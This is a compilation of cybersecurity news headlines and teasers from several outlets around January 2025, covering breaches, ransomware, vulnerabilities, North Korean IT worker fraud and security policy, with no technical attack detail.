North Korean Fake IT Workers More Aggressively Extorting Enterprises

North Korean fake IT workers are more aggressively extorting their employers in response to law enforcement actions.

The post North Korean Fake IT Workers More Aggressively Extorting Enterprises appeared first on SecurityWeek.

In Other News: VPN Supply Chain Attack, PayPal $2M Settlement, RAT Builder Hacks Script Kiddies

Noteworthy stories that might have slipped under the radar: Korean VPN supply chain attack, PayPal settles with New York for $2 million, trojanized RAT builder targets script kiddies.  

The post In Other News: VPN Supply Chain Attack, PayPal $2M Settlement, RAT Builder Hacks Script Kiddies appeared first on SecurityWeek.

Sweden seizes cargo ship after another undersea cable hit in suspected sabotage

NATO increasing patrols in the Baltic as region awaits navy drones

Swedish authorities have "seized" a vessel – believed to be the cargo ship Vezhen – "suspected of carrying out sabotage" after a cable running between Sweden and Latvia in the Baltic Sea was damaged on the morning of January 26.…

CDNs: Great for speeding up the internet, bad for location privacy

Also, Subaru web portal spills user deets, Tornado Cash sanctions overturned, a Stark ransomware attack, and more

Infosec in brief  Using a custom-built tool, a 15-year-old hacker exploited Cloudflare's content delivery network to approximate the locations of users of apps like Signal, Discord, and others.…

British Museum says ex-contractor 'shut down' IT systems, wreaked havoc

Former freelancer cuffed a week after being dismissed by UK's top visitor attraction

The British Museum was forced to temporarily close some galleries and exhibitions this weekend after a disgruntled former tech contractor went rogue and shuttered some onsite IT systems.…

Someone is slipping a hidden backdoor into Juniper routers across the globe, activated by a magic packet

Who could be so interested in chips, manufacturing, and more, in the US, UK, Europe, Russia...

Someone has been quietly backdooring selected Juniper routers around the world in key sectors including semiconductor, energy, and manufacturing, since at least mid-2023.…

UK telco TalkTalk confirms probe into alleged data grab underway

Spinner says crim's claims 'very significantly overstated'

UK broadband and TV provider TalkTalk says it's currently investigating claims made on cybercrime forums alleging data from the company was up for grabs.…

AI chatbot startup founder, lawyer wife accused of ripping off investors in $60M fraud

GameOn? It's looking more like game over for that biz

The co-founder and former CEO of AI startup GameOn is in a pickle. After exiting the top job last year under a cloud, he's now in court – along with his wife – for allegedly bilking his company and its investors out of more than $60 million.…

Don't want your Kubernetes Windows nodes hijacked? Patch this hole now

SYSTEM-level command injection via API parameter *chef's kiss*

A now-fixed command-injection bug in Kubernetes can be exploited by a remote attacker to gain code execution with SYSTEM privileges on all Windows endpoints in a cluster, and thus fully take over those systems, according to Akamai researcher Tomer Peled.…

North Korean dev who renamed himself 'Bane' accused of IT worker fraud caper

5 indicted as FBI warns North Korea dials up aggression, plus Russian devs allegedly get in on the act

The US is indicting yet another five suspects it believes were involved in North Korea's long-running, fraudulent remote IT worker scheme – including one who changed their last name to "Bane" and scored a gig at a tech biz in San Francisco.…

China and friends claim success in push to stamp out tech support cyber-scam slave camps

Paint a target on Myanmar, pledge more info-sharing to get the job done

A group established by six Asian nations to fight criminal cyber-scam slave camps that infest the region claims it’s made good progress dismantling the operations.…

Court rules FISA Section 702 surveillance of US resident was unconstitutional

'Public interest alone does not justify warrantless querying' says judge

It was revealed this week a court in New York made a landmark ruling that sided against the warrantless state surveillance of people's private communications in America.…

One of Salt Typhoon's favorite flaws still wide open on 91% of at-risk Exchange Servers

But we mean, you've had nearly four years to patch

One of the critical security flaws exploited by China's Salt Typhoon to breach US telecom and government networks has had a patch available for nearly four years - yet despite repeated warnings from law enforcement and private-sector security firms, nearly all public-facing Microsoft Exchange Server instances with this vulnerability remain unpatched.…

Patch now: Cisco fixes critical 9.9-rated, make-me-admin bug in Meeting Management

No in-the-wild exploits … yet

Cisco has pushed a patch for a critical, 9.9-rated vulnerability in its Meeting Management tool that could allow a remote, authenticated attacker with low privileges to escalate to administrator on affected devices.…

SonicWall flags critical bug likely exploited as zero-day, rolls out hotfix

Big organizations and governments are main users of these gateways

SonicWall is warning customers of a critical vulnerability that was potentially already exploited as a zero-day.…

Meta's pay-or-consent model under fire from EU consumer group

Company 'strongly disagrees' with law infringement allegations

Meta has again come under fire for its pay-or-consent model in the EU.…

FortiGate config leaks: Victims' email addresses published online

Experts warn not to take SNAFU lightly as years-long compromises could remain undetected

Thousands of email addresses included in the Belsen Group's dump of FortiGate configs last week are now available online, revealing which organizations may have been impacted by the 2022 zero-day exploits.…

Who is DDoSing you? Rivals, probably, or cheesed-off users

Plus: 'Largest-ever' duff traffic tsunami clocks in at 5.6 Tbps

In addition to Chinese spies invading organizations' networks and ransomware crews locking up sensitive files, botnets blasting distributed denial of service (DDoS) attacks can still cause a world of hurt — and website downtime — and it's quite likely your competitors are to blame.…

Biz tax rises, inflation and high interest. Why fewer UK tech firms started in 2024

And the government thinks that AI and taking shackles off big tech will help? God help Britain

For the first time since the start of the pandemic, the number of tech firms incorporated in the UK has declined, with a shrinking economy, as well as high inflation and interest rates causing a slump in business confidence.…

Asus lets processor security fix slip out early, AMD confirms patch in progress

Answers on a postcard to what 'Microcode Signature Verification Vulnerability' might mean

AMD has confirmed at least some of its microprocessors suffer a microcode-related security vulnerability, the existence of which accidentally emerged this month after a fix for the flaw appeared in a beta BIOS update from PC maker Asus.…

Oracle emits 603 patches, names one it wants you to worry about soon

Old flaws that keep causing trouble haunt Big Red

Oracle has delivered its regular quarterly collection of patches: 603 in total, 318 for its own products, and another 285 for Linux code it ships.…

Trump 'waved a white flag to Chinese hackers' as Homeland Security axed cyber advisory boards

And: America 'has never been less secure,' retired rear admiral tells Congress

The Trump administration gutted key cybersecurity advisory boards in its first days, as expert witnesses warned Congress of potentially destructive cyberattacks by China.…

Supply chain attack hits Chrome extensions, could expose millions

Threat actor exploited phishing and OAuth abuse to inject malicious code

Cybersecurity outfit Sekoia is warning Chrome users of a supply chain attack targeting browser extension developers that has potentially impacted hundreds of thousands of individuals already.…

Give users confidence in your digital infrastructure

Why Digital Trust and crypto-agility are essential to authentication and data security

Sponsored Post  Research firm IDC estimates that over 53 percent of organizations are now mostly or completely digital native.…

Microsoft issues out-of-band fix for Windows Server 2022 NUMA glitch

Update addresses boot failures on multi-node systems

Microsoft is releasing an out-of-band patch to deal with a problem that prevented some Windows Server 2022 machines from booting.…

Silk Road's Dread Pirate Roberts walks free as Trump pardons dark web kingpin

Ross Ulbricht's family are now appealing for donations to support his reintegration into society

Silk Road founder Ross Ulbricht is now a free man after US President Donald Trump made good on his promise to issue a federal pardon upon taking office.…

Infosec was literally the last item in Trump's policy plan, yet major changes are likely on his watch

Everyone agrees defense matters. How to do it is up for debate

Feature  The Trump administration came to office this week without a detailed information security policy, but analysis of cabinet nominees’ public remarks and expert comments suggest it will make significant changes in the field.…

Ransomware scum make it personal for Reg readers by impersonating tech support

That invitation to a Teams call on which IT promises to mop up a spamstorm may not be what it seems

Two ransomware campaigns are abusing Microsoft Teams to infect organizations and steal data, and the crooks may have ties to Black Basta and FIN7, according to Sophos.…

PowerSchool theft latest: Decades of Canadian student records, data from 40-plus US states feared stolen

Lawsuits pile up after database accessed by miscreants

Updated  Canada's largest school board has revealed that student records dating back to 1985 may have been accessed by miscreants who compromised software provider PowerSchool.…

Patch procrastination leaves 50,000 Fortinet firewalls vulnerable to zero-day

Seven days after disclosure and little action taken, data shows

Fortinet customers need to get with the program and apply the latest updates as nearly 50,000 management interfaces are still vulnerable to the latest zero-day exploit.…

HPE probes IntelBroker's bold data theft boasts

Incident response protocols engaged following claims of source code burglary

Hewlett Packard Enterprise (HPE) is probing assertions made by prolific Big Tech intruder IntelBroker that they broke into the US corporation's systems and accessed source code, among other things.…

Banks must keep ahead of risks and reap AI rewards

AI has transformed banking across APAC. But is this transformation secure?

Partner Content  The banking industry in Asia Pacific (APAC) is thriving, with strong financial performance underpinning its technological ambitions.…

Hackers game out infowar against China with the US Navy

Taipei invites infosec bods to come and play on its home turf

Picture this: It's 2030 and China's furious with Taiwan after the island applies to the UN to be recognized as an independent state. After deciding on a full military invasion, China attempts to first cripple its rebellious neighbor's critical infrastructure.…

How to leave the submarine cable cutters all at sea – go Swedish

Clear rules and guaranteed consequences concentrate the mind wonderfully. Just ask a Russian

Opinion  "As obsolete as warships in the Baltic" was a great pop lyric in Prefab Sprout's 1985 gem, Faron Young. Great, but ironically obsolete itself. Sweden has just deployed multiple warships in that selfsame sea to guard against the very modern menace of underwater cable cutting.…

Ransomware attack forces Brit high school to shut doors

Students have work to complete at home in the meantime

A UK high school will have to close for at least two days, today and tomorrow, after becoming the latest public-sector victim of ransomware criminals.…

Sage Copilot grounded briefly to fix AI misbehavior

'Minor issue' with showing accounting customers 'unrelated business information' required repairs

Sage Group plc has confirmed it temporarily suspended its Sage Copilot, an AI assistant for the UK-based business software maker's accounting tools, this month after it blurted customer information to other users.…

Datacus extractus: Harry Potter publisher breached without resorting to magic

PLUS: Allstate sued for allegedly tracking drivers; Dutch DDoS; More fake jobs from Pyongyang; and more

Infosec in brief  Hogwarts doesn’t teach an incantation that could have saved Harry Potter publisher Scholastic from feeling the power of an online magician who made off with millions of customer records - except perhaps the wizardry of multifactor authentication.…

When food delivery apps reached Indonesia, everyone put on weight

PLUS: Salt Typhoon and IT worker scammers sanctioned; Alibaba Cloud’s K8s go global; Amazon acquires Indian BNPL company

Asia In Brief  When food delivery “superapps” started operations in Indonesia, users started putting on weight – and that’s not an entirely bad thing.…

Donald Trump proposes US govt acquire half of TikTok, which thanks him and restores service

The same Florida Man who wanted to ban the app in the first place

US president-elect Donald Trump appears to have proposed the government he will soon lead should acquire half of made-in-China social media service TikTok’s stateside operations.…

OpenAI's ChatGPT crawler can be tricked into DDoSing sites, answering your queries

The S in LLM stands for Security

OpenAI's ChatGPT crawler appears to be willing to initiate distributed denial of service (DDoS) attacks on arbitrary websites, a reported vulnerability the tech giant has yet to acknowledge.…

FCC to telcos: By law you must secure your networks from foreign spies. Get on it

Plus: Uncle Sam is cross with this one Chinese biz over Salt Typhoon mega-snooping

Decades-old legislation requiring American telcos to lock down their systems to prevent foreign snoops from intercepting communications isn't mere decoration on the pages of law books – it actually means carriers need to secure their networks, the FCC has huffed.…

Biden signs sweeping cybersecurity order, just in time for Trump to gut it

Ransomware, AI, secure software, digital IDs – there's something for everyone in the presidential directive

Analysis  Joe Biden, in the final days of his US presidency, issued another cybersecurity order that is nearly as vast in scope as it is late in the game.…

Fortinet: FortiGate config leaks are genuine but misleading

Competition hots up with Ivanti over who can have the worst start to a year

Fortinet has confirmed that previous analyses of records leaked by the Belsen Group are indeed genuine FortiGate configs stolen during a zero-day raid in 2022.…

Clock ticking for TikTok as US Supreme Court upholds ban

With Biden reportedly planning to skirt enforcement and kick the can to Trump, this saga might still not be over

Updated  The US Supreme Court has upheld a law requiring TikTok to either divest from its Chinese parent ByteDance or face a ban in the United States. The decision eliminates the final legal obstacle to the federal government forcing a shutdown of the platform for US users on January 19.…

Six vulnerabilities in ubiquitous rsync tool announced and fixed in a day

Turns out tool does both file transfers and security fixes fast

Don't panic. Yes, there were a bunch of CVEs, affecting potentially hundreds of thousands of users, found in rsync in early December – and made public on Tuesday – but a fixed version came out the same day, and was further tweaked for better compatibility the following day.…

Medusa ransomware group claims attack on UK's Gateshead Council

Pastes allegedly stolen documents on leak site with £600K demand

Another year and yet another UK local authority has been pwned by a ransomware crew. This time it's Gateshead Council in North East England at the hands of the Medusa group.…

Microsoft eggheads say AI can never be made secure – after testing Redmond's own products

If you want a picture of the future, imagine your infosec team stamping on software forever

Microsoft brainiacs who probed the security of more than 100 of the software giant's own generative AI products came away with a sobering message: The models amplify existing security risks and create new ones.…

Just as your LLM once again goes off the rails, Cisco, Nvidia are at the door smiling

Some of you have apparently already botched chatbots or allowed ‘shadow AI’ to creep in

Cisco and Nvidia have both recognized that as useful as today's AI may be, the technology can be equally unsafe and/or unreliable – and have delivered tools in an attempt to help address those weaknesses.…

GM parks claims that driver location data was given to insurers, pushing up premiums

We'll defo ask for permission next time, automaker tells FTC

General Motors on Thursday said that it has reached a settlement with the FTC "to address privacy concerns about our now-discontinued Smart Driver program."…

Russia's Star Blizzard phishing crew caught targeting WhatsApp accounts

FSB cyberspies venture into a new app for espionage, Microsoft says

updated  Star Blizzard, a prolific phishing crew backed by the Russian Federal Security Service (FSB), conducted a new campaign aiming to compromise WhatsApp accounts and gain access to their messages and data, according to Microsoft.…

Enzo Biochem settles lawsuit over 2023 ransomware attack for $7.5M

That's in addition to the $4.5M fine paid to three state AGs last year

Enzo Biochem has settled a consolidated class-action lawsuit relating to its 2023 ransomware incident for $7.5 million.…

Raspberry Pi hands out prizes to all in the RP2350 Hacking Challenge

Power-induced glitches, lasers, and electromagnetic fields are all tools of the trade

Raspberry Pi has given out prizes for extracting a secret value from the one-time-programmable (OTP) memory of the Raspberry Pi RP2350 microcontroller – awarding a pile of cash to all four entrants.…

Hidden Text Salting Disrupts Brand Name Detection Systems

A new phishing tactic has been identified by Cisco Talos, using hidden text salting to evade email security measures

New Phishing Campaign Targets Mobile Devices with Malicious PDFs

A novel phishing campaign identified by Zimperium targets mobile users with malicious PDFs, impersonating USPS to steal credentials

SaaS Breaches Skyrocket 300% as Traditional Defenses Fall Short

Obsidian found that threat actors are focusing on SaaS applications to steal sensitive data, with most organizations' security measures not set up to deal with these attacks

CISOs Boost Crisis Simulation Budgets Amid High-Profile Cyber-Attacks

74% of CISOs plan to increase their cyber crisis simulation budgets in 2025

Subaru Bug Enabled Remote Vehicle Tracking and Hijacking

A now-patched vulnerability could have enabled threat actors to remotely control Subaru cars

Change Healthcare Breach Almost Doubles in Size to 190 Million Victims

Change Healthcare has claimed 190 million customers were affected by a mega-breach last year

AWS Announces £5m Grant for Cyber Education in the UK

Amazon Web Services has launched its Cyber Education Grant Program in the UK

Russian Scammers Target Crypto Influencers with Infostealers

Crazy Evil, a group of crypto scammers, exploit NFTs and cryptocurrencies with malware targeting influencers and tech professionals

North Korean IT Workers Holding Data Hostage for Extortion, FBI Warns

A new FBI advisory warned that North Korean IT worker schemes have escalated their activities in recent months to include data extortion

Ransomware Gangs Linked by Shared Code and Ransom Notes

SentinelOne researchers highlighted similarities in the approaches used by the HellCat and Morpheus ransomware groups, suggesting shared infrastructure

Chained Vulnerabilities Exploited in Ivanti Cloud Service Appliances

Threat actors chained Ivanti CSA vulnerabilities for RCE, credential theft & webshell deployment

Bookmakers Ramp Up Efforts to Combat Arbitrage Betting Fraud

Arbitrage betting fraud rises, forcing bookmakers to adopt stricter measures against automated scams

5,000+ SonicWall firewalls still open to attack (CVE-2024-53704)

5,000+ SonicWall firewalls are still vulnerable to attack via a high-severity vulnerability (CVE-2024-53704) that, according to SonicWall, should be considered “at imminent risk of exploitation”. The warning came last week from Bishop Fox researchers, after they successfully exploited the vulnerability on unpatched SonicWall firewalls and announced they will be releasing details of their exploit code on February 10. “Although significant reverse-engineering effort was required to find and exploit the vulnerability, the exploit itself is rather … More →

The post 5,000+ SonicWall firewalls still open to attack (CVE-2024-53704) appeared first on Help Net Security.

Silobreaker Tickets empowers intelligence teams with AI-augmented tools

Silobreaker launched Tickets, a workflow management feature designed to elevate the efficiency, collaboration and impact of intelligence teams. Tickets is built with native support for Threat Intelligence teams, offering robust capabilities to manage and fulfil intelligence requirements across cyber, geopolitical and physical security domains – all supported by AI-driven insights. Tickets empowers teams of all sizes to prioritise and manage both incoming Requests for Information (RFI) and outbound incidents, which are surfaced from Silobreaker’s extensive … More →

The post Silobreaker Tickets empowers intelligence teams with AI-augmented tools appeared first on Help Net Security.

AI security posture management will be needed before agentic AI takes hold

As I’m currently knee deep in testing agentic AI in all its forms, as well as new iterations of current generative AI models such as OpenAI’s O1, the complexities of securing AI bot frameworks for enterprise security teams are beginning to crystallize.

The post AI security posture management will be needed before agentic AI takes hold appeared first on Help Net Security.

Don’t let these open-source cybersecurity tools slip under your radar

This article showcases free, open-source cybersecurity tools that help you identify and address vulnerabilities, detect intrusion, protect websites from cyber attacks, monitor and detect suspicious activities across your network. Am I Isolated: Open-source container security benchmark Am I Isolated is an open-source container security benchmark that probes users’ runtime environments and tests for container isolation. Argus: Open-source information gathering toolkit Argus is an open-source toolkit that simplifies information gathering and reconnaissance. It features a user-friendly … More →

The post Don’t let these open-source cybersecurity tools slip under your radar appeared first on Help Net Security.

Cyber trends set to influence business strategies

Diligent convened a group of 65 board members, C-suite executives, and leading subject matter experts to explore topics shaping the future of business: generative AI, cybersecurity and data privacy, geopolitical risk, and financial fraud and abuse. In this Help Net Security video, Dottie Schindlinger, Executive Director of the Diligent Institute, discusses how 2025 presents boards with a technological headache and how these topics will shape cyber strategies at a board level across the new year … More →

The post Cyber trends set to influence business strategies appeared first on Help Net Security.

How to use Apple’s App Privacy Report to monitor data tracking

The App Privacy Report, which Apple introduced in iOS 15.2, allows users to monitor how apps access data and interact with third-party services. The report provides an in-depth analysis of the types of sensitive data accessed by apps, the external domains they communicate with, and the extent to which apps utilize Apple’s App Tracking Transparency (ATT) to request user consent for tracking activity across other apps and websites. Here’s a step-by-step guide on how to … More →

The post How to use Apple’s App Privacy Report to monitor data tracking appeared first on Help Net Security.

Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 48,000+ internet-facing Fortinet firewalls still open to attack Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. Ransomware attackers are “vishing” organizations via Microsoft Teams The “email … More →

The post Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams appeared first on Help Net Security.

North Korean IT workers are extorting employers, FBI warns

The FBI is on a mission to raise awareness about the threat that North Korean IT workers present to organizations in the US and around the world. While corporate espionage comes to mind first, the threat goes beyond that: “In recent months, in addition to data extortion, FBI has observed North Korean IT workers leveraging unlawful access to company networks to exfiltrate proprietary and sensitive data, facilitate cyber-criminal activities, and conduct revenue-generating activity on behalf … More →

The post North Korean IT workers are extorting employers, FBI warns appeared first on Help Net Security.

Aviat Networks enhances software cybersecurity offering

Aviat Networks announced that it has enhanced its Secure Software Development Lifecycle (SSDLC) process and Software Vulnerability Alert (SVA) service designed to strengthen Aviat’s software and firmware development process to comply with latest cybersecurity requirements. With the increasing number of vulnerabilities, threats and attacks, SSDLC and SVA are now seen as essential countermeasures to protect against software security threats for critical communications networks. Aviat’s SSDLC is a structured process to improve cybersecurity for all Aviat … More →

The post Aviat Networks enhances software cybersecurity offering appeared first on Help Net Security.

Nearly half of CISOs now report to CEOs, showing their rising influence

The CISO’s rise to the C-suite comes with more engagement with the boardroom, an audience with the CEO, and the power to make strategic decisions for the business, according to Splunk. CISOs report to the C-suite (Source: Splunk) 82% of surveyed CISOs now report directly to the CEO, a significant increase from 47% in 2023. In addition, 83% of CISOs participate in board meetings somewhat often or most of the time. While 60% acknowledge that … More →

The post Nearly half of CISOs now report to CEOs, showing their rising influence appeared first on Help Net Security.

Exabeam Extends Generative AI Reach to LogRhythm SIEM

Exabeam has extended the reach of its generative artificial intelligence (GenAI) capabilities to its LogRhythm security information event management platform which is designed to be deployed by internal IT teams.

The post Exabeam Extends Generative AI Reach to LogRhythm SIEM appeared first on Security Boulevard.

Humans are the Beating Heart of the Autonomous SOC

Ultimately, the goal of the autonomous SOC is to create a more efficient and effective security environment where human analysts and AI work together to achieve a higher level of security than either could achieve alone. Working together, each improves the other.

The post Humans are the Beating Heart of the Autonomous SOC appeared first on Security Boulevard.

Do You Know What Your Assets Are?

Asset awareness is the first step in understanding your complete security posture. If you don’t know what assets you own, how can you protect them? 

The post Do You Know What Your Assets Are?  appeared first on Security Boulevard.

Are Third-Party Risk Management Solutions Effective Enough?

A modern EASM solution offers more by incorporating meaningful first-party and third-party cyber risk insights than conventional TPRM solutions.

The post Are Third-Party Risk Management Solutions Effective Enough?   appeared first on Security Boulevard.

Data Privacy Day 2025: A Chance to Take Control of Your Data

Data Privacy Day 2025: A Chance to Take Control of Your Data
madhav
Mon, 01/27/2025 - 09:19

The post Data Privacy Day 2025: A Chance to Take Control of Your Data appeared first on Security Boulevard.

DMARC Email Security: A Guide to Protecting Your Domain

Learn how DMARC email security can protect your brand, improve deliverability, and prevent phishing attacks. Get expert advice and best practices.

The post DMARC Email Security: A Guide to Protecting Your Domain  appeared first on Security Boulevard.

Gravy Analytics Breach, Subaru Starlink Vulnerability Exposed

In this episode, we discuss the latest issues with data brokers, focusing on a breach at Gravy Analytics that leaked 30 million location data points online. We also explore a vulnerability in Subaru’s Starlink system that allows unrestricted access to vehicle controls and customer data using just a last name and license plate number. Co-host […]

The post Gravy Analytics Breach, Subaru Starlink Vulnerability Exposed appeared first on Shared Security Podcast.

The post Gravy Analytics Breach, Subaru Starlink Vulnerability Exposed appeared first on Security Boulevard.

Innovative Approaches to Secrets Scanning

Is Traditional Cybersecurity Enough in the Age of Automation? Imagine this. You’re in charge of your company’s cybersecurity, and you’ve invested in the best protection money can buy. But a data breach happens, and you’re left wondering where things went wrong. Could the intrusion have been prevented? Is there a better way to safeguard your […]

The post Innovative Approaches to Secrets Scanning appeared first on Entro.

The post Innovative Approaches to Secrets Scanning appeared first on Security Boulevard.

Empowering Cloud Compliance with Seamless Security

Why are Non-Human Identities (NHIs) Crucial for Seamless Security? Can you imagine a smooth security system that leaves no stone unturned? Non-human identities (NHIs) and secrets management play a significant role in creating an empowered security strategy, particularly in the cloud environment. NHIs, defined as machine identities in cybersecurity, are the linchpins that control access […]

The post Empowering Cloud Compliance with Seamless Security appeared first on Entro.

The post Empowering Cloud Compliance with Seamless Security appeared first on Security Boulevard.

Scaling Security with Automated Identity Management

How Crucial is Automated Identity Management in Scaling Security? There’s an ever-increasing need for advanced cybersecurity measures. Organizations, especially those operating in the cloud, can no longer afford to ignore automated identity management as a key part of these precautions. But what does that really entail? And why is it so essential to scaling security? […]

The post Scaling Security with Automated Identity Management appeared first on Entro.

The post Scaling Security with Automated Identity Management appeared first on Security Boulevard.

Clone2Leak attacks exploit Git flaws to steal credentials

A set of three distinct but related attacks, dubbed 'Clone2Leak,' can leak credentials by exploiting how Git and its credential helpers handle authentication requests. [...]

UnitedHealth now says 190 million impacted by 2024 data breach

UnitedHealth has revealed that 190 million Americans had their personal and healthcare data stolen in the Change Healthcare ransomware attack, nearly doubling the previously disclosed figure. [...]

Ransomware gang uses SSH tunnels for stealthy VMware ESXi access

Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected. [...]

TalkTalk investigates breach after data for sale on hacking forum

UK telecommunications company TalkTalk is investigating a third-party supplier data breach after a threat actor began selling alleged customer data on a hacking forum. [...]

PayPal to pay $2 million settlement over 2022 data breach

New York State has announced a $2,000,000 settlement with PayPal over charges it failed to comply with the state's cybersecurity regulations, leading to a 2022 data breach. [...]

Zyxel warns of bad signature update causing firewall boot loops

Zyxel is warning that a bad security signature update is causing critical errors for USG FLEX or ATP Series firewalls, including putting the device into a boot loop. [...]

Microsoft to deprecate WSUS driver synchronization in 90 days

Microsoft has reminded Windows administrators that driver synchronization in Windows Server Update Services (WSUS) will be deprecated on April 18, 90 days from now. [...]

Subaru Starlink flaw let hackers hijack cars in US and Canada

Security researchers have discovered an arbitrary account takeover flaw in Subaru's Starlink service that could let attackers track, control, and hijack vehicles in the United States, Canada, and Japan using just a license plate. [...]

Hackers use Windows RID hijacking to create hidden admin account

A North Korean threat group has been using a technique called RID hijacking that tricks Windows into treating a low-privileged account as one with administrator permissions. [...]

Hacker infects 18,000 "script kiddies" with fake malware builder

A threat actor targeted low-skilled hackers, known as "script kiddies," with a fake malware builder that secretly infected them with a backdoor to steal data and take over computers. [...]

Microsoft: Outdated Exchange servers fail to auto-mitigate security bugs

Microsoft says outdated Exchange servers cannot receive new emergency mitigation definitions because an Office Configuration Service certificate type is being deprecated. [...]

Managed Detection and Response – How are you monitoring?

Security Information and Event Management (SIEM) systems are now a critical component of enterprise security. Learn more from Smarttech247 about how its VisionX + Splunk solution can help secure your organization. [...]

Hackers get $886,250 for 49 zero-days at Pwn2Own Automotive 2025

​The Pwn2Own Automotive 2025 hacking contest has ended with security researchers collecting $886,250 after exploiting 49 zero-days. [...]

TalkTalk investigating data breach after hacker claims theft of customer data

A hacker claims to be selling the data of 18.8 million TalkTalk customers, but the telecoms giant says this figure is ‘significantly overstated’

© 2024 TechCrunch. All rights reserved. For personal use only.

US indicts five individuals in crackdown on North Korea’s illicit IT workforce

The multi-year scheme saw the defendants generate hundreds of thousands in revenue.

© 2024 TechCrunch. All rights reserved. For personal use only.

OpenAI says it may store deleted Operator data for up to 90 days

OpenAI says that it might store chats and associated screenshots from customers who use Operator, the company’s AI “agent” tool, for up to 90 days — even after a user manually deletes them. OpenAI has a similar deleted data retention policy for ChatGPT, its AI-powered chatbot platform. However, the retention period for ChatGPT is only […]

© 2024 TechCrunch. All rights reserved. For personal use only.

Passbolt raises $8M for its open source password manager for teams

Password managers have become commonplace at this point. But businesses often have different needs than consumers. Teams, after all, often have to share credentials to access resources, all while IT and security teams need ways to control who has access to them. Passbolt, which is announcing an $8 million seed round Thursday, aims to become […]

© 2024 TechCrunch. All rights reserved. For personal use only.

Conduent confirms outage was due to a cybersecurity incident

U.S. government contractor Conduent, which provides technology to support services such as child support and food assistance, has confirmed that a recent outage was caused by a cybersecurity incident.  Conduent confirmed the disruption, which left some U.S. residents without access to support payments, to TechCrunch on Tuesday but declined to say whether the outage was […]

© 2024 TechCrunch. All rights reserved. For personal use only.

What PowerSchool isn’t saying about its ‘massive’ student data breach

The hack has the potential to be one of the biggest of the year, but the edtech giant is refusing to answer important questions

© 2024 TechCrunch. All rights reserved. For personal use only.

Toronto school district says 40 years of student data stolen in PowerSchool breach

Canada’s largest school board says hackers may have accessed some 40 years’ worth of student data during the recent PowerSchool breach.  In a letter sent to parents this week, the Toronto District School Board (TDSB) said that the data breach affected all students enrolled in the district between September 1985 and December 2024.  The school […]

© 2024 TechCrunch. All rights reserved. For personal use only.

HPE investigating security breach after hacker claims theft of sensitive data

A well-known hacker claims to have stolen source code and user data from the enterprise IT giant

© 2024 TechCrunch. All rights reserved. For personal use only.

Treasury sanctions Salt Typhoon hacking group behind breaches of major US telecom firms

The US government has also sanctioned the hacker responsible for December's US Treasury hack

© 2024 TechCrunch. All rights reserved. For personal use only.

Clop ransomware gang names dozens of victims hit by Cleo mass-hack, but several firms dispute breaches

The Russia-linked ransomware group is threatening to leak data stolen from almost 60 Cleo Software customers if ransoms aren't paid

© 2024 TechCrunch. All rights reserved. For personal use only.

PowerSchool data breach victims say hackers stole ‘all’ historical student and teacher data

A trove of information on current and former students and teachers was accessed during the December cyberattack, sources say

© 2024 TechCrunch. All rights reserved. For personal use only.

UK plans to ban public sector organizations from paying ransomware hackers

The Home Office has proposed a 'targeted ban' on ransom payments following a wave a cyberattacks targeting the UK

© 2024 TechCrunch. All rights reserved. For personal use only.

UK domain giant Nominet confirms cybersecurity incident linked to Ivanti VPN hacks

Nominet, the U.K. domain registry that maintains .co.uk domains, has experienced a cybersecurity incident that it confirmed is linked to the recent exploitation of a new Ivanti VPN vulnerability. In an email to customers, seen by TechCrunch, Nominet warned of an “ongoing security incident” under investigation. Nominet said hackers accessed its systems via “third-party VPN […]

© 2024 TechCrunch. All rights reserved. For personal use only.

Microsoft accuses group of developing tool to abuse its AI service in new lawsuit

Microsoft has taken legal action against a group the company claims intentionally developed and used tools to bypass the safety guardrails of its cloud AI products. According to a complaint filed by the company in December in the U.S. District Court for the Eastern District of Virginia, a group of 10 unnamed defendants allegedly used […]

© 2024 TechCrunch. All rights reserved. For personal use only.

A drone punched a hole into an LA firefighting plane

A drone collided with a 'Super Scooper' firefighting plane.

© 2024 TechCrunch. All rights reserved. For personal use only.

Cannabis company Stiiizy says hackers accessed customers’ ID documents

A ransomware gang took credit for the breach, claiming to have stolen over 400,000 government-issued identity documents from customers.

© 2024 TechCrunch. All rights reserved. For personal use only.

DoorBox debuts its new and improved smart delivery box at CES 2025

Millions of packages are stolen each year. DoorBox aims to change how packages are delivered with its smart package box that features a theft-proof design with live camera feeds and an alarm that activates automatically if the box is tampered with.  After selling 2,000 units of its initial version, which offered manual functionality, the startup […]

© 2024 TechCrunch. All rights reserved. For personal use only.

PowerSchool says hackers stole students’ sensitive data, including Social Security numbers, in data breach

In an FAQ obtained by TechCrunch, PowerSchool confirms it negotiated with the threat actors responsible for the breach.

© 2024 TechCrunch. All rights reserved. For personal use only.

Hackers are exploiting a new Ivanti VPN security bug to hack into company networks

Mandiant says a Chinese cyberespionage group has been exploiting the critical-rated vulnerability since at least mid-December.

© 2024 TechCrunch. All rights reserved. For personal use only.

The US has a new cybersecurity safety label for smart devices

The White House this week announced a new label for internet-connected devices, the U.S. Cyber Trust Mark, intended to help consumers make more-informed decisions about the cybersecurity of products they bring into their homes. To earn the U.S. Cyber Trust Mark, which is being administered by the Federal Communications Commission, companies have to test their […]

© 2024 TechCrunch. All rights reserved. For personal use only.

KoDDos Will be at CyberShow 2025 in Paris!

The post KoDDos Will be at CyberShow 2025 in Paris! appeared first on KoDDoS Blog.

Technological innovation in the heart of Los Angeles at the CES 2025 🚀

🚀 Cutting-Edge Services KoDDoS has established itself as a key player in the field of high-performance hosting. Specializing in anti-DDoS protection, we ensure unmatched service continuity for our clients in the face of growing threats targeting digital infrastructures. We also invest in groundbreaking technologies, including Web3, blockchain, and the Internet of Things (IoT), providing tailored … Continue reading Technological innovation in the heart of Los Angeles at the CES 2025 🚀

The post Technological innovation in the heart of Los Angeles at the CES 2025 🚀 appeared first on KoDDoS Blog.

Recruitment Announcement: B2B Sales Representatives and Business Introducers

